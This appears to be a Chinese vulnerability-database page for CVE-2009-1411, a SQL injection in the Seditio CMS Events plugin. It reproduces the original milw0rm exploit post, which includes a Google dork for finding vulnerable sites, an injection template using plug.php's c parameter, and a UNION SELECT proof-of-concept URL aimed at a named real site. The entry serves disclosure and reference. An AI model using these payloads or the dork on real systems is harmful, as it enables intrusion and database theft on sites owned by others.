Neocrome Seditio CMS Events插件'events/inc/events.inc.php' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117621 漏洞类型 SQL注入
发布时间 2009-04-20 更新时间 2009-04-27
CVE编号 CVE-2009-1411 CNNVD-ID CNNVD-200904-480
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8482
https://cxsecurity.com/issue/WLB-2009040238
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-480
|漏洞详情
SeditioEventspluginCMS1.0版本中的events/inc/events.inc.php存在SQL注入漏洞。远程攻击者可以借助提交到plug.php的c参数,执行任意的SQL指令。
|漏洞EXP
[+]=================================================================[+]
		[x]Title    : Seditio Events Remote SQL Injection
				      Seditio Events Plugin Remote SQL Injection
		[x]Software : Seditio CMS
		[x]Vendor   : www.neocrome.ne
		[x]Date     : 17 April 2009 ( Indonesia ) 
		[x]Author   : OoN_Boy
		[x]Contact  : oon.boy9@gmail.com
		[x]Blog     : http://oonboy.blogspot.com
[+]=================================================================[+]
		[x] Google Dork

		"Powered by Seditio"
[+]=================================================================[+]
		[x] Exploit

		http://[site]/[path]/plug.php?e=events&f=old&c=all' [SQL]/*
[+]=================================================================[x]
		[x]Poc
		
		http://thespider.neocrome.org/plug.php?e=events&f=old&c=all' union select 1,2,3,4,5,version(),7,8,9,0,1,2,3/*
[+]=================================================================[+]
		[x] Special Greetz
		
		www.BatamHacker.or.id www.MainHack.com - www.ServerIsDown.org - 
		Vrs-hCk, c0li, h4ntu, Opay, Ipay, Paman, NoGe, H312Y, pizzyroot,
		xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, 
		Dan buat semuanya yg ga bisa di sebut satu²
[+]=================================================================[+]

# milw0rm.com [2009-04-20]
|参考资料

来源:XF
名称:seditio-events-eventsinc-sql-injection(49975)
链接:http://xforce.iss.net/xforce/xfdb/49975
来源:VUPEN
名称:ADV-2009-1112
链接:http://www.vupen.com/english/advisories/2009/1112
来源:BID
名称:34608
链接:http://www.securityfocus.com/bid/34608
来源:MILW0RM
名称:8482
链接:http://www.milw0rm.com/exploits/8482
来源:SECUNIA
名称:34812
链接:http://secunia.com/advisories/34812
来源:OSVDB
名称:53827
链接:http://osvdb.org/53827